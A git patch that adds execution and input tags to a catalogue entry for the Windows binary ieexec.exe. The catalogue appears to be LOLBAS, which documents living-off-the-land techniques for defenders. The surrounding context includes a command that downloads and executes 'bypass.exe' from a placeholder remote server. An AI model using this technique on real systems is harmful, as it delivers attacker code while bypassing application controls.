From e8c0c77d7939d93e0058e71cbebfbcacc5fd20c4 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 13:31:56 +0200
Subject: [PATCH] Update Ieexec.yml Tags

Added Tags:
Execute .NetEXE
Execute Remote
Input Custom Format
---
 yml/OSBinaries/Ieexec.yml | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml
index 0987d2b..43ba954 100644
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@@ -11,6 +11,10 @@ Commands:
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    Tags:
+      - Execute: Remote
+      - Execute: .NetEXE
+      - Input: Custom Format
   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
     Description: Downloads and executes bypass.exe from the remote server.
     Usecase: Download and run attacker code from remote location
@@ -18,6 +22,10 @@ Commands:
     Privileges: User
     MitreID: T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    Tags:
+      - Execute: Remote
+      - Execute: .NetEXE
+      - Input: Custom Format
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe